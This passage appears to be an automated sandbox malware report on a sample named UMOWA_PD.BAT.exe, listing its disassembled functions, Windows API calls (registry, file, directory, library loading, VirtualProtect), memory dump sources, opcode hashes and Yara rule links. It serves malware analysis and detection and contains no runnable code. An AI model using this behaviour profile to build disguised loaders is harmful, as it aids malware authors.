                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                    • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                                                                    • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                    • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                                                                                    Function 00402439 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseDeleteValue
                                                                                    • String ID:
                                                                                    • API String ID: 2831762973-0
                                                                                    • Opcode ID: 729ecf5bba26eed59db8e40ba0825d20aa39ecfc350fd83ab66bb719c7a4b8e3
                                                                                    • Instruction ID: 823524eaaa32c5521ce5516f6f818df3cdafdbc5371ac3c1d9ba599ed9425974
                                                                                    • Opcode Fuzzy Hash: 729ecf5bba26eed59db8e40ba0825d20aa39ecfc350fd83ab66bb719c7a4b8e3
                                                                                    • Instruction Fuzzy Hash: 46F06232A04520ABDB10BBA89A8DAEE62B5AF54314F11443FE502B71C1CAFC4D02976D
                                                                                    Function 00405A75 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AB7
                                                                                    • GetLastError.KERNEL32 ref: 00405AC5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1375471231-0
                                                                                    • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                    • Instruction ID: 25953aab165e2e3bb2b5eb59dc1d6ee29197e23c9d0e5a802ce790cbbbfebc39
                                                                                    • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                    • Instruction Fuzzy Hash: 33F0F4B1D1060EDADB00DFA4C6497EFBBB4AB04309F04812AD941B6281D7B982488FA9
                                                                                    Function 00401EE3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401F01
                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401F0C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnableShow
                                                                                    • String ID:
                                                                                    • API String ID: 1136574915-0
                                                                                    • Opcode ID: b342668e68410e2d968fedd3eb79c8682b657b25800b9077b5ecd2124e99ac37
                                                                                    • Instruction ID: a6cb0e5ea3b461fc76251f348ffd86be0a73501dc920cd99368f231d5504fafc
                                                                                    • Opcode Fuzzy Hash: b342668e68410e2d968fedd3eb79c8682b657b25800b9077b5ecd2124e99ac37
                                                                                    • Instruction Fuzzy Hash: F2E09A36A082049FE705EBA8AE484AEB3B0EB40325B200A7FE001F11C0CBB94C00866C
                                                                                    Function 00406915 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                                                      • Part of subcall function 004068A5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                                                      • Part of subcall function 004068A5: wsprintfW.USER32 ref: 004068F7
                                                                                      • Part of subcall function 004068A5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2547128583-0
                                                                                    • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                    • Instruction ID: 5852e889d14e736f2df1098d3b7202b06462132acdc852f75f804bf3a6ff6809
                                                                                    • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                    • Instruction Fuzzy Hash: FCE08673604310EBD61056755D04D2773A8AF95A50302483EFD46F2144D738DC32A66A
                                                                                    Function 00406011 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\UMOWA_PD.BAT.exe,80000000,00000003), ref: 00406015
                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AttributesCreate
                                                                                    • String ID:
                                                                                    • API String ID: 415043291-0
                                                                                    • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                    • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                                    • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                    • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                                    Function 00405ACF Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                                                    • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AE3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1375471231-0
                                                                                    • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                    • Instruction ID: c141ebc68f4164d0a3663fa1b1ea49181af819f28e12deb644bc081b11005b13
                                                                                    • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                    • Instruction Fuzzy Hash: 5DC08C30300A02DACF000B218F087073950AB00380F19483AA582E00A0CA308044CD2D
                                                                                    Function 00402896 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028B4
                                                                                      • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePointerwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 327478801-0
                                                                                    • Opcode ID: c408762c6ae6a09676534d13277c6868af0c4062816ce02b100207dfef7a20c8
                                                                                    • Instruction ID: 3ecce12b6213660a705480fd24811c4b14f3d13bc743ad81d22bf59cde18bc7d
                                                                                    • Opcode Fuzzy Hash: c408762c6ae6a09676534d13277c6868af0c4062816ce02b100207dfef7a20c8
                                                                                    • Instruction Fuzzy Hash: 8DE06D71904208AFDB01ABA5AA498AEB379EB44344B10483FF101B10C0CA794C119A2D
                                                                                    Function 0040173A Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040174E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: PathSearch
                                                                                    • String ID:
                                                                                    • API String ID: 2203818243-0
                                                                                    • Opcode ID: 96c3c64599610033e1741a12b780745032a27335a1d6010ee521e40a3137f023
                                                                                    • Instruction ID: 71d187b5cc8d7de3a3c01a98f906eab562aacc0ad357dac51c0352885440fd59
                                                                                    • Opcode Fuzzy Hash: 96c3c64599610033e1741a12b780745032a27335a1d6010ee521e40a3137f023
                                                                                    • Instruction Fuzzy Hash: D9E04871204104ABE700DB64DD48EAA7778DB5035CF20453AE511A60D1E6B55905971D
                                                                                    Function 004060C3 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3934441357-0
                                                                                    • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                    • Instruction ID: de33e43015841e90b47a85578f5cc3acb86098a1fa118a6604a55d69533944a7
                                                                                    • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                    • Instruction Fuzzy Hash: 41E08C3224022AABCF109E508D00EEB3B6CEB003A0F018433FD26E2090D630E83197A4
                                                                                    Function 00406094 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034B1,00000000,00000000,00403308,000000FF,00000004,00000000,00000000,00000000), ref: 004060A8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                    • Instruction ID: fd87eb1c4e4509ee71b5dc1f82ee1534a3bbef2287d177a98c1a1ef8e7fccbc0
                                                                                    • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                    • Instruction Fuzzy Hash: 11E08C3229021AEBDF119E50CC00AEB7BACEB043A0F018436FD22E3180D671E83187A9
                                                                                    Function 6FE22A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualProtect.KERNELBASE(6FE2505C,00000004,00000040,6FE2504C), ref: 6FE22A9D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15222039276.000000006FE21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FE20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15221966825.000000006FE20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15222110605.000000006FE24000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15222184730.000000006FE26000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6fe20000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: d21249227e261a19582842496aac6cdc1e892ba1e96a6c7e8c89b806dc94b4d6
                                                                                    • Instruction ID: 5dcd21c184a38a714b9ec0f93603e749d7e825d8fac21ca7f8248ab41cf67bc7
                                                                                    • Opcode Fuzzy Hash: d21249227e261a19582842496aac6cdc1e892ba1e96a6c7e8c89b806dc94b4d6
                                                                                    • Instruction Fuzzy Hash: C7F0AEB0904B80DECB50CF2C8E44F193FE2BB1B334B24452AE188D6249FF344464DBA5
                                                                                    Function 0040638E Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040641C,?,?,?,?,Call,?,00000000), ref: 004063B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Open
                                                                                    • String ID:
                                                                                    • API String ID: 71445658-0
                                                                                    • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                    • Instruction ID: 99177681843bc7d8b33aa39255ce29306f0e35401c43de39655aaedf71f86506
                                                                                    • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                    • Instruction Fuzzy Hash: DAD0173204020DBBDF119E90ED01FAB3B6DAB08350F014826FE06A40A0D776D534ABA8
                                                                                    Function 004015A8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 58434a7e7cdfb0d0f19199f5504f69f984a7681d240ae9cdceb23cdc370956f4
                                                                                    • Instruction ID: f79479eb79e616cc8aec51f56aa6edc525cb8d4391243906608abe1f76efb7bb
                                                                                    • Opcode Fuzzy Hash: 58434a7e7cdfb0d0f19199f5504f69f984a7681d240ae9cdceb23cdc370956f4
                                                                                    • Instruction Fuzzy Hash: 3DD05B72B08204DBDB01DBE8EA48A9E73B09B50328F20893BD111F11D0D6B9C945A75D
                                                                                    Function 004044A0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetDlgItemTextW.USER32(?,?,00000000), ref: 004044BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
